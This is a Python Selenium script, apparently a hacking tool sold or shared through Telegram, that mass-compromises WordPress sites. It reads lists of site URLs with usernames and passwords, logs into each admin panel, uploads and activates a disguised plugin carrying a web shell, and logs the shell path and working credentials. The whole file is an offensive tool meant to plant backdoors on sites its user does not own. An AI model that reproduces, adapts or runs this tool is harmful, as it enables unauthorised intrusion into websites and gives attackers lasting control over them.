from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import requests
import boto3
import driver
import os
import subprocess
from selenium.webdriver.chrome.options import Options
from colorama import init
import re, os, getpass

red = '\033[91m'
ble = '\033[94m'
green = '\033[92m'
whit = '\033[00m'
yellow ='\033[0;33m'
    
import os
if os.name == 'nt':
  try:
    os.system('title Mass Upload Shell Wordpress. ICQ : @xaighost')
  except:
    pass
def createFolder(directory):
    try:
        if not os.path.exists(directory):
            os.makedirs(directory)
    except OSError:
        print ('Error: Creating directory. ' +  directory)
createFolder('Result')
open('Result\ShellUpload.txt','a')
open('Result\Try_manually.txt','a')
open('Result\workingLogins.txt','a')
open('Result\PluginError.txt','a')
open('Result\PageError.txt','a')
def remindme(url):
    global driver
    try:
        chrome_options = Options()
        chrome_options.add_argument("--log-level=3")
        chrome_options.add_argument("--disable-extensions")
        chrome_options.add_argument("--incognito")
        driver = webdriver.Chrome("C:\wpnew\driver\chromedriver.exe", options=chrome_options)
        ur = url.rstrip()
        ch = ur.split('\n')[0].split('|')
        link = ch[0]
        user = ch[1]
        passx = ch[2]
        driver.get(link)
        inputElement = driver.find_element_by_id("user_login")
        inputElement.send_keys(user)
        inputElement = driver.find_element_by_id("user_pass")
        inputElement.send_keys(passx)
        inputElement.send_keys(Keys.ENTER)
        if "Remind me later=" in str(driver.current_url):
            print(green + "Success Login " + link + whit)
            open("Result\workingLogins.txt", "a").write(url + '\n')
            driver.find_element_by_id("correct-admin-email").click()
            link = str(driver.current_url).split("/wp-admin")[0]
            driver.get(link + '/wp-admin/plugin-install.php?tab=upload')
            driver.find_element_by_id("pluginzip").send_keys(r"C:\wpnew\Shell\shell.zip")
            driver.find_element_by_id("install-plugin-submit").click()
            driver.find_element_by_link_text('Activate Plugin').click()
            open("Result\ShellUpload.txt", "a").write(link + '/wp-content/plugins/cachee-fast-wp/log.php' + '\n')
            print(green + "Success Uploading " + link + '/wp-content/plugins/cachee-fast-wp/log.php' + whit)
            driver.close()
        else:
            print(green + "Success Login " + link + whit)
            open("Result\workingLogins.txt", "a").write(url + '\n')
            try:
                driver.find_element_by_id("correct-admin-email").click()
                link = str(driver.current_url).split("/wp-admin")[0]
                lang = detect("Plugins, Upload-Plugins, pluginzip, Plugin zip file")
                driver.get(link + '/wp-admin/plugin-install.php?tab=upload')
                driver.find_element_by_id("pluginzip").send_keys(r"C:\wpnew\Shell\shell.zip")
                driver.find_element_by_id("install-plugin-submit").click()
                driver.find_element_by_link_text('Activate Plugin').click()
                open("Result\Result\ShellUpload.txt", "a").write(link + '/wp-content/plugins/cachee-fast-wp/log.php' + '\n')
                print(green + "Success Uploading " + link + '/wp-content/plugins/cachee-fast-wp/log.php' + whit)
            except:
                try:
                    link = str(driver.current_url).split("/wp-admin")[0]
                    driver.get(link + '/wp-admin/plugin-install.php?tab=upload')
                    driver.find_element_by_id("pluginzip").send_keys(r"C:\wpnew\Shell\shell.zip")
                    driver.find_element_by_id("install-plugin-submit").click()
                    try:
                        driver.find_element_by_id("error-page")
                        print(yellow + "Page Error Try Manual " + link )
                        open("Result\PageError.txt", "a").write(url +'\n')
                        driver.close()
                    except:
                        print(green + "Succes Uploading {0}/wp-content/plugins/cachee-fast-wp/log.php".format(
                            link) + whit)
                        open("Result\ShellUpload.txt", "a").write(link + '/wp-content/plugins/cachee-fast-wp/log.php' + '\n')
                        driver.close()
                except:
                    print(ble + "Plugin Not Work in the site {}".format(link) + whit)
                    open("Result\PluginError.txt", "a").write(url +'\n')
                    driver.close()
    except:
        print(yellow + "Detected Pop up, Manual in {}".format(url) + whit)
        open("Result\Try_manually.txt", "a").write(url +'\n')
        driver.close()

init()
def banner():
    print(f'''
                        \033[92;1m  
@@@  @@@  @@@ @@@@@@@     @@@@@@@  @@@@@@   @@@@@@  @@@       @@@@@@ 
@@!  @@!  @@! @@!  @@@      @!!   @@!  @@@ @@!  @@@ @@!      !@@     
@!!  !!@  @!@ @!@@!@!       @!!   @!@  !@! @!@  !@! @!!       !@@!!  
 !:  !!:  !!  !!:           !!:   !!:  !!! !!:  !!! !!:          !:! 
  ::.:  :::    :             :     : :. :   : :. :  : ::.: : ::.: :   Mass Wordpress Upload Shell (EP)
\033[1;37;40m
Auto Upload shell on wordpress logs Generation V4 [Human Bot] 
\033[93;1mTelegram: @xaighost
\033[96;1mAuthor : xaighost

\033[95;1mPT. Bot Jaya Abadi
''')

banner()
def clear():
    linux = 'clear'
    windows = 'cls'
    os.system([linux, windows][(os.name == 'nt')])

def main():
    liists = input('Enter Your List :')
    with open(liists) as f:
        for url in f:
            remindme(url)

if __name__ == '__main__':
    main()
